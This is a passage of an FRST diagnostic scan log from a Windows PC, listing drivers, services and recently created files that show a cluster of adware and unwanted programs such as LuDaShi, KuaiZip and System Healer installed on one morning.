    S3 stmtpm; C:\Windows\system32\drivers\stm_tpm.sys [29184 2012-05-25] (STMicroelectronics, INC)
    R3 ST_ACCEL; C:\Windows\System32\DRIVERS\ST_ACCEL.sys [68208 2012-11-06] (STMicroelectronics)
    S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [13920 2016-09-16] ()
    S3 tcm; C:\Windows\system32\drivers\tcm.sys [17048 2012-07-04] ()
    S1 bsdpf64; \??\C:\WINDOWS\system32\Drivers\bsdpf64.sys [X]
    S1 bsdpr64; \??\C:\WINDOWS\system32\Drivers\bsdpr64.sys [X]
    S2 ComputerZLock; \??\C:\Program Files (x86)\LuDaShi\ComputerZLock_x64.sys [X] <==== ATTENTION
    S3 ComputerZ_x64; \??\C:\Program Files (x86)\LuDaShi\ComputerZ_x64.sys [X] <==== ATTENTION

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    NETSVCx32: HpSvc -> C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll ==> No File

    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-09-18 11:57 - 2016-09-18 11:57 - 02399232 _____ (Farbar) C:\Users\Administrator\Downloads\FRST64.exe
    2016-09-18 11:57 - 2016-09-18 11:57 - 00023903 _____ C:\Users\Administrator\Downloads\FRST.txt
    2016-09-18 11:57 - 2016-09-18 11:57 - 00000000 ____D C:\FRST
    2016-09-18 11:05 - 2016-09-18 11:09 - 00172700 _____ C:\WINDOWS\ntbtlog.txt
    2016-09-18 10:49 - 2016-09-18 10:50 - 49521912 _____ (www.ludashi.com) C:\Users\Administrator\Downloads\ludashisetup.exe
    2016-09-18 10:48 - 2016-09-18 11:44 - 00001207 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2016-09-18 10:48 - 2016-09-18 11:44 - 00001195 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
    2016-09-18 10:48 - 2016-09-18 10:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
    2016-09-18 10:48 - 2016-09-18 10:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
    2016-09-18 10:45 - 2016-09-18 10:46 - 00000000 ____D C:\Users\Administrator\AppData\Local\4C4C4544-1474195550-5810-8038-B3C04F425431
    2016-09-18 09:15 - 2016-09-18 09:15 - 00003110 _____ C:\WINDOWS\System32\Tasks\{AC769F71-F24C-4982-9CD9-2399739747D0}
    2016-09-18 09:09 - 2016-09-18 09:09 - 00003120 _____ C:\WINDOWS\System32\Tasks\{9CBDDEFC-08B0-4505-B272-4C0259D93CAD}
    2016-09-18 09:09 - 2016-09-18 09:09 - 00000000 ____D C:\WINDOWS\system32\appmgmt
    2016-09-18 09:08 - 2016-09-18 09:08 - 00003586 _____ C:\WINDOWS\System32\Tasks\{C7D820FC-CDAB-40D6-BEDE-D25C4C86FE7F}
    2016-09-18 09:08 - 2016-09-18 09:08 - 00003106 _____ C:\WINDOWS\System32\Tasks\{5E89D5D4-C91B-4F37-AF11-F0CBE417CCC0}
    2016-09-18 09:06 - 2016-09-18 09:06 - 00003594 _____ C:\WINDOWS\System32\Tasks\{E2E7A15A-991B-470C-85A5-CFECBCB02080}
    2016-09-18 08:49 - 2016-09-18 08:49 - 00000000 ____D C:\WINDOWS\system32\guu
    2016-09-18 08:12 - 2016-09-18 11:14 - 00000053 _____ C:\Users\Administrator\AppData\Roaming\st
    2016-09-18 08:06 - 2016-09-18 08:50 - 00000356 _____ C:\WINDOWS\Tasks\PC SpeedUp Service Deactivator.job
    2016-09-18 08:06 - 2016-09-18 08:07 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\lockhomepage
    2016-09-18 08:06 - 2016-09-18 08:06 - 00002736 _____ C:\WINDOWS\System32\Tasks\PC SpeedUp Service Deactivator
    2016-09-18 08:05 - 2016-09-18 09:57 - 00000000 ____D C:\Program Files (x86)\LuDaShib
    2016-09-18 08:05 - 2016-09-18 09:52 - 00003408 _____ C:\WINDOWS\System32\Tasks\ComputerZ-Tray
    2016-09-18 08:05 - 2016-09-18 08:11 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Ludashi
    2016-09-18 08:05 - 2016-09-18 08:06 - 00000000 ____D C:\ProgramData\Ronzaps
    2016-09-18 08:05 - 2016-09-18 08:06 - 00000000 ____D C:\ProgramData\Doubleings
    2016-09-18 08:05 - 2016-09-18 08:05 - 00002397 _____ C:\WINDOWS\SysWOW64\findit.xml
    2016-09-18 08:05 - 2016-09-18 08:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\鲁大师
    2016-09-18 08:04 - 2016-09-18 09:10 - 00000000 ____D C:\Users\Administrator\AppData\Local\WikiZ
    2016-09-18 08:04 - 2016-09-18 08:50 - 00000000 ____D C:\Program Files\nplusb
    2016-09-18 08:04 - 2016-09-18 08:04 - 02279413 _____ C:\Users\Administrator\AppData\Roaming\True-Top.bin
    2016-09-18 08:04 - 2016-09-18 08:04 - 02279413 _____ C:\Users\Administrator\AppData\Roaming\MedJob.bin
    2016-09-18 08:04 - 2016-09-18 08:04 - 02279413 _____ C:\Users\Administrator\AppData\Roaming\Betastock.bin
    2016-09-18 08:04 - 2016-09-18 08:04 - 01903938 _____ C:\Users\Administrator\AppData\Roaming\Tipair.tst
    2016-09-18 08:04 - 2016-09-18 08:04 - 00072823 _____ C:\Users\Administrator\AppData\Roaming\Labin.tst
    2016-09-18 08:04 - 2016-09-18 08:04 - 00000000 ____D C:\ProgramData\Logic Handler
    2016-09-18 08:04 - 2016-09-18 08:03 - 02148864 _____ C:\Users\Administrator\AppData\Roaming\Tipair.exe
    2016-09-18 08:04 - 2016-09-18 08:03 - 02148864 _____ C:\Users\Administrator\AppData\Roaming\Labin.exe
    2016-09-18 08:03 - 2016-09-18 11:29 - 00000000 ____D C:\ProgramData\Ronzap
    2016-09-18 08:03 - 2016-09-18 09:49 - 00000000 ____D C:\Program Files (x86)\KuaiZipb
    2016-09-18 08:03 - 2016-09-18 09:06 - 00000000 ____D C:\ProgramData\Doubleing
    2016-09-18 08:03 - 2016-09-18 08:04 - 07090176 _____ C:\Users\Administrator\AppData\Roaming\agent.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 00126464 _____ C:\Users\Administrator\AppData\Roaming\noah.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 00126464 _____ C:\Users\Administrator\AppData\Roaming\lobby.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 00070704 _____ C:\Users\Administrator\AppData\Roaming\Config.xml
    2016-09-18 08:03 - 2016-09-18 08:04 - 00054272 _____ C:\Users\Administrator\AppData\Roaming\ApplicationHosting.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 00018432 _____ C:\Users\Administrator\AppData\Roaming\Main.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 00005568 _____ C:\Users\Administrator\AppData\Roaming\md.xml
    2016-09-18 08:03 - 2016-09-18 08:03 - 02148864 _____ C:\Users\Administrator\AppData\Roaming\VillaStattom.exe
    2016-09-18 08:03 - 2016-09-18 08:03 - 02148864 _____ C:\Users\Administrator\AppData\Roaming\Triodom.exe
    2016-09-18 08:03 - 2016-09-18 08:03 - 01903938 _____ C:\Users\Administrator\AppData\Roaming\Triodom.tst
    2016-09-18 08:03 - 2016-09-18 08:03 - 01903938 _____ C:\Users\Administrator\AppData\Roaming\Freshdinfind.tst
    2016-09-18 08:03 - 2016-09-18 08:03 - 00093072 _____ (WinMount International Inc) C:\WINDOWS\system32\Drivers\KuaiZipDrive2.sys
    2016-09-18 08:03 - 2016-09-18 08:03 - 00072823 _____ C:\Users\Administrator\AppData\Roaming\VillaStattom.tst
    2016-09-18 08:03 - 2016-09-18 08:03 - 00072823 _____ C:\Users\Administrator\AppData\Roaming\Koncom.tst
    2016-09-18 08:03 - 2016-09-18 08:03 - 00004092 _____ C:\WINDOWS\System32\Tasks\e02c4bd5-54d5-4470-9ea0-a68d88112c00
    2016-09-18 08:03 - 2016-09-18 08:03 - 00003358 _____ C:\WINDOWS\System32\Tasks\KuaiZip_Update
    2016-09-18 08:03 - 2016-09-18 08:03 - 00003260 _____ C:\WINDOWS\System32\Tasks\nerta
    2016-09-18 08:03 - 2016-09-18 08:03 - 00001041 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\KuaiZip.lnk
    2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Softlink
    2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\KuaiZip
    2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\Administrator\AppData\Local\A
    2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\ProgramData\CloudPrinter
    2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Program Files (x86)\Stlr
    2016-09-18 08:03 - 2016-09-18 08:01 - 02148864 _____ C:\Users\Administrator\AppData\Roaming\Koncom.exe
    2016-09-18 08:03 - 2016-09-18 08:01 - 02148864 _____ C:\Users\Administrator\AppData\Roaming\Freshdinfind.exe
    2016-09-18 08:02 - 2016-09-18 08:02 - 00003040 _____ C:\WINDOWS\System32\Tasks\ttwifi
    2016-09-18 08:02 - 2016-09-18 08:02 - 00002988 _____ C:\WINDOWS\System32\Tasks\Pritc
    2016-09-18 08:02 - 2016-09-18 08:02 - 00000000 ____D C:\Users\Administrator\AppData\LocalLow\Company
    2016-09-18 08:02 - 2016-09-18 08:02 - 00000000 ____D C:\Users\Administrator\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
    2016-09-18 08:02 - 2016-09-18 08:02 - 00000000 ____D C:\Users\Administrator\AppData\Local\WINTUNEPRO
    2016-09-18 08:02 - 2016-09-18 08:02 - 00000000 ____D C:\uninst
    2016-09-18 08:01 - 2016-09-18 09:55 - 00000000 ____D C:\Program Files (x86)\sunnydayb
    2016-09-18 08:01 - 2016-09-18 09:10 - 00000000 ____D C:\Program Files (x86)\hostb
    2016-09-18 08:01 - 2016-09-18 08:50 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Gajedefsim
    2016-09-18 08:01 - 2016-09-18 08:50 - 00000000 ____D C:\Program Files\Icattib
    2016-09-18 08:01 - 2016-09-18 08:48 - 00000000 ____D C:\Program Files\IcattiUnb
    2016-09-18 08:01 - 2016-09-18 08:03 - 00018528 _____ C:\Users\Administrator\AppData\Roaming\InstallationConfiguration.xml
    2016-09-18 08:01 - 2016-09-18 08:01 - 00140288 _____ C:\Users\Administrator\AppData\Roaming\Installer.dat
    2016-09-18 08:01 - 2016-09-18 08:01 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\QuickCleaner
    2016-09-18 08:01 - 2016-09-18 08:01 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Win Tune Pro
    2016-09-18 08:01 - 2016-09-18 08:01 - 00000000 ____D C:\Users\Administrator\AppData\Local\Tempfolder
    2016-09-18 08:01 - 2016-09-18 08:01 - 00000000 ____D C:\ProgramData\desktopfindkey
    2016-09-18 08:01 - 2016-09-18 08:01 - 00000000 ____D C:\Program Files (x86)\Win Tune Pro
    2016-09-18 08:00 - 2016-09-18 08:12 - 00000000 ____D C:\Users\Administrator\AppData\Local\app
    2016-09-18 07:59 - 2016-09-18 09:47 - 00000000 ____D C:\Program Files (x86)\DPowerb
    2016-09-18 07:59 - 2016-09-18 09:07 - 00000000 ____D C:\Users\Administrator\AppData\Local\AppTrailers
    2016-09-18 07:59 - 2016-09-18 07:59 - 00895488 _____ C:\Users\Administrator\AppData\Local\misgua.dll
    2016-09-18 07:59 - 2016-09-18 07:59 - 00002560 _____ C:\Users\Administrator\AppData\Local\uninstallssl.exe
    2016-09-18 07:59 - 2016-09-18 07:59 - 00000000 ____D C:\Program Files\Casterb
    2016-09-18 07:58 - 2016-09-18 09:58 - 00000000 ____D C:\Program Files (x86)\mpck
    2016-09-18 07:58 - 2016-09-18 09:41 - 00000000 ____D C:\Users\Administrator\AppData\Local\Apps\2.0
    2016-09-18 07:58 - 2016-09-18 07:59 - 00000000 ____D C:\Program Files (x86)\EasyHotspotb
    2016-09-18 07:58 - 2016-09-18 07:58 - 00441344 _____ C:\ProgramData\smp2.exe
    2016-09-18 07:58 - 2016-09-18 07:58 - 00004182 _____ C:\WINDOWS\System32\Tasks\SMW_P
    2016-09-18 07:58 - 2016-09-18 07:58 - 00000000 ____H C:\WINDOWS\system32\BIT1C02.tmp
    2016-09-18 07:58 - 2016-09-18 07:58 - 00000000 ____D C:\Users\Administrator\AppData\Local\tuto_monetize_120160918
    2016-09-18 07:58 - 2016-09-18 07:58 - 00000000 ____D C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431
    2016-09-18 07:58 - 2016-09-18 07:58 - 00000000 ____D C:\Program Files\Common Files\Noobzo
    2016-09-18 07:57 - 2016-09-18 07:57 - 00003514 _____ C:\WINDOWS\System32\Tasks\bvyvcvd
    2016-09-18 07:56 - 2016-09-18 08:48 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\NUIns
    2016-09-18 07:56 - 2016-09-18 08:48 - 00000000 ____D C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431
    2016-09-18 07:56 - 2016-09-18 07:57 - 00000000 ____D C:\Users\Administrator\AppData\Local\SearchProtect
    2016-09-18 07:56 - 2016-09-18 07:57 - 00000000 ____D C:\Users\Administrator\AppData\Local\bvyvcvd
    2016-09-18 07:56 - 2016-09-18 07:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Youtube Downloader
    2016-09-18 07:55 - 2016-09-18 11:27 - 00000288 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
    2016-09-18 07:55 - 2016-09-18 09:07 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\K9Tools
    2016-09-18 07:55 - 2016-09-18 08:51 - 00002936 _____ C:\WINDOWS\SysWOW64\LavasoftTcpServiceOff.ini
    2016-09-18 07:55 - 2016-09-18 08:51 - 00002936 _____ C:\WINDOWS\system32\LavasoftTcpServiceOff.ini
    2016-09-18 07:55 - 2016-09-18 08:50 - 00000288 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
    2016-09-18 07:55 - 2016-09-18 07:56 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Interstatnogui
    2016-09-18 07:55 - 2016-09-18 07:55 - 00425744 _____ (Lavasoft Limited) C:\WINDOWS\system32\LavasoftTcpService64.dll
    2016-09-18 07:55 - 2016-09-18 07:55 - 00345360 _____ (Lavasoft Limited) C:\WINDOWS\SysWOW64\LavasoftTcpService.dll
    2016-09-18 07:55 - 2016-09-18 07:55 - 00024264 _____ C:\WINDOWS\System32\Tasks\{78047A47-0C79-0578-0A11-0C7F0F7A117D}
    2016-09-18 07:55 - 2016-09-18 07:55 - 00003584 _____ C:\WINDOWS\System32\Tasks\System Healer Task
    2016-09-18 07:55 - 2016-09-18 07:55 - 00003344 _____ C:\WINDOWS\System32\Tasks\SystemHealer Run Delay
    2016-09-18 07:55 - 2016-09-18 07:55 - 00003278 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
    2016-09-18 07:55 - 2016-09-18 07:55 - 00002880 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
    2016-09-18 07:55 - 2016-09-18 07:55 - 00002578 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
    2016-09-18 07:55 - 2016-09-18 07:55 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\K9AMW
    2016-09-18 07:55 - 2016-09-18 07:55 - 00000000 ____D C:\Users\Administrator\AppData\Local\CrashRpt
    2016-09-18 07:55 - 2016-09-18 07:55 - 00000000 ____D C:\ProgramData\4f8a1888-71e5-0
    2016-09-18 07:55 - 2016-09-18 07:55 - 00000000 ____D C:\ProgramData\4f8a1888-4c51-1
    2016-09-18 07:55 - 2016-09-18 07:55 - 00000000 ____D C:\ProgramData\1f0ab4e9-7297-1
    2016-09-18 07:55 - 2016-09-18 07:55 - 00000000 ____D C:\ProgramData\1f0ab4e9-4821-0
    2016-09-18 06:33 - 2016-09-18 06:33 - 00000000 ____D C:\Users\Default\AppData\Local\Microsoft Help
    2016-09-18 06:33 - 2016-09-18 06:33 - 00000000 ____D C:\Users\Default User\AppData\Local\Microsoft Help
    2016-09-16 21:23 - 2016-09-16 21:25 - 00000000 ____D C:\WINDOWS\system32\MRT
    2016-09-16 21:23 - 2016-09-16 21:23 - 144199024 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
    2016-09-16 21:12 - 2016-09-18 08:50 - 00000000 ____D C:\SUPERDelete
    2016-09-16 18:50 - 2016-09-16 18:50 - 01014080 _____ ( ) C:\Users\Administrator\Downloads\Firefox_Setup(1).exe
    2016-09-16 18:49 - 2016-09-16 18:50 - 40326904 _____ C:\Users\Administrator\Downloads\Firefox_Setup.exe
    2016-09-16 18:47 - 2016-09-18 11:27 - 00000434 _____ C:\WINDOWS\Tasks\DriverUpdate Startup.job
    2016-09-16 18:47 - 2016-09-17 18:47 - 00000488 _____ C:\WINDOWS\Tasks\DriverUpdate Scan.job
    2016-09-16 18:47 - 2016-09-16 18:47 - 00003232 _____ C:\WINDOWS\System32\Tasks\DriverUpdate Scan
    2016-09-16 18:47 - 2016-09-16 18:47 - 00002876 _____ C:\WINDOWS\System32\Tasks\DriverUpdate Startup
    2016-09-16 18:46 - 2016-09-16 21:14 - 00000000 ____D C:\Users\Administrator\AppData\Local\SlimWare Utilities Inc
    2016-09-16 18:46 - 2016-09-16 18:46 - 00985288 _____ (Slimware Utilities Holdings, Inc.) C:\Users\Administrator\Downloads\DriverUpdate-setup.exe
    2016-09-16 18:46 - 2016-09-16 18:46 - 00013920 _____ C:\WINDOWS\system32\Drivers\SWDUMon.sys
    2016-09-16 18:46 - 2016-09-16 18:46 - 00000000 ____D C:\Users\Public\Documents\Downloaded Installers
    2016-09-16 10:46 - 2016-09-16 11:05 - 00000000 ____D C:\aa Canon 450D Master acum
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\WINDOWS\PCHEALTH
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SharePoint
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 8
    2016-09-16 10:39 - 2016-09-16 10:39 - 00000000 __RHD C:\MSOCache
    2016-09-16 10:39 - 2016-09-16 10:39 - 00000000 ____D C:\Users\Administrator\AppData\Local\Microsoft Help
    2016-09-16 10:39 - 2016-09-16 10:39 - 00000000 ____D C:\Program Files\Microsoft Office
    2016-09-16 10:34 - 2016-09-16 10:35 - 266433120 _____ (Microsoft Corporation) C:\Users\Administrator\Downloads\SharePointDesigner.exe
    2016-09-14 01:10 - 2016-09-01 15:26 - 00394440 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
    2016-09-14 01:10 - 2016-09-01 14:41 - 00346320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
    2016-09-14 01:10 - 2016-08-31 23:18 - 02724864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
    2016-09-14 01:10 - 2016-08-31 23:08 - 20312064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
    2016-09-14 01:10 - 2016-08-31 22:48 - 00062464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iesetup.dll
    2016-09-14 01:10 - 2016-08-31 22:46 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
    2016-09-14 01:10 - 2016-08-31 22:46 - 00341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\html.iec
    2016-09-14 01:10 - 2016-08-31 22:46 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieetwproxystub.dll
    2016-09-14 01:10 - 2016-08-31 22:44 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
    2016-09-14 01:10 - 2016-08-31 22:34 - 02286592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
    2016-09-14 01:10 - 2016-08-31 22:31 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
    2016-09-14 01:10 - 2016-08-31 22:31 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iernonce.dll
    2016-09-14 01:10 - 2016-08-31 22:26 - 00476160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieui.dll
    2016-09-14 01:10 - 2016-08-31 22:24 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
    2016-09-14 01:10 - 2016-08-31 22:24 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieUnatt.exe
    2016-09-14 01:10 - 2016-08-31 22:23 - 00620032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
    2016-09-14 01:10 - 2016-08-31 22:08 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtmsft.dll
    2016-09-14 01:10 - 2016-08-31 21:59 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JavaScriptCollectionAgent.dll
    2016-09-14 01:10 - 2016-08-31 21:57 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inseng.dll
    2016-09-14 01:10 - 2016-08-31 21:53 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrating.dll
    2016-09-14 01:10 - 2016-08-31 21:52 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
    2016-09-14 01:10 - 2016-08-31 21:48 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
    2016-09-14 01:10 - 2016-08-31 21:45 - 00130048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\occache.dll
    2016-09-14 01:10 - 2016-08-31 21:34 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
    2016-09-14 01:10 - 2016-08-31 21:30 - 00692736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
    2016-09-14 01:10 - 2016-08-31 21:29 - 02055680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
    2016-09-14 01:10 - 2016-08-31 21:29 - 01155072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmlmedia.dll
    2016-09-14 01:10 - 2016-08-31 21:27 - 13808128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
    2016-09-14 01:10 - 2016-08-31 21:24 - 04607488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
    2016-09-14 01:10 - 2016-08-31 20:45 - 25770496 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
    2016-09-14 01:10 - 2016-08-31 20:43 - 02445824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
    2016-09-14 01:10 - 2016-08-31 20:42 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
    2016-09-14 01:10 - 2016-08-31 20:40 - 02724864 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
    2016-09-14 01:10 - 2016-08-31 20:40 - 00004096 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwcollectorres.dll
    2016-09-14 01:10 - 2016-08-31 20:38 - 01316352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
    2016-09-14 01:10 - 2016-08-31 20:25 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iesetup.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 02894336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 00576000 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
    2016-09-14 01:10 - 2016-08-31 20:24 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwproxystub.dll
    2016-09-14 01:10 - 2016-08-31 20:16 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
    2016-09-14 01:10 - 2016-08-31 20:15 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\iernonce.dll
    2016-09-14 01:10 - 2016-08-31 20:12 - 00615936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
    2016-09-14 01:10 - 2016-08-31 20:11 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieUnatt.exe
    2016-09-14 01:10 - 2016-08-31 20:11 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwcollector.exe
    2016-09-14 01:10 - 2016-08-31 20:10 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
    2016-09-14 01:10 - 2016-08-31 20:10 - 00814080 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
    2016-09-14 01:10 - 2016-08-31 20:06 - 06047232 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
    2016-09-14 01:10 - 2016-08-31 20:03 - 00968704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MsSpellCheckingFacility.exe
    2016-09-14 01:10 - 2016-08-31 19:59 - 00489984 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtmsft.dll
    2016-09-14 01:10 - 2016-08-31 19:51 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\JavaScriptCollectionAgent.dll
    2016-09-14 01:10 - 2016-08-31 19:50 - 00107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\inseng.dll
    2016-09-14 01:10 - 2016-08-31 19:47 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrating.dll
    2016-09-14 01:10 - 2016-08-31 19:46 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
    2016-09-14 01:10 - 2016-08-31 19:44 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
    2016-09-14 01:10 - 2016-08-31 19:42 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\system32\occache.dll
    2016-09-14 01:10 - 2016-08-31 19:31 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
    2016-09-14 01:10 - 2016-08-31 19:29 - 00724992 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
    2016-09-14 01:10 - 2016-08-31 19:28 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
    2016-09-14 01:10 - 2016-08-31 19:27 - 01359360 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmlmedia.dll
    2016-09-14 01:10 - 2016-08-31 19:26 - 02131456 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
    2016-09-14 01:10 - 2016-08-31 19:15 - 15411712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
    2016-09-14 01:10 - 2016-08-31 19:10 - 02921472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
    2016-09-14 01:10 - 2016-08-31 18:58 - 01550848 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
    2016-09-14 01:10 - 2016-08-31 18:47 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
    2016-09-14 01:10 - 2016-08-12 12:26 - 00464896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
    2016-09-14 01:10 - 2016-08-12 12:26 - 00405504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
    2016-09-14 01:10 - 2016-08-12 12:26 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys
    2016-09-14 01:09 - 2016-09-02 11:40 - 00631176 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
    2016-09-14 01:09 - 2016-09-02 11:35 - 05548264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
    2016-09-14 01:09 - 2016-09-02 11:35 - 00706280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
    2016-09-14 01:09 - 2016-09-02 11:35 - 00154856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
    2016-09-14 01:09 - 2016-09-02 11:35 - 00095464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys
    2016-09-14 01:09 - 2016-09-02 11:34 - 01732864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00503808 _____ (Microsoft Corporation) C:\WINDOWS\system32\srcore.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64win.dll
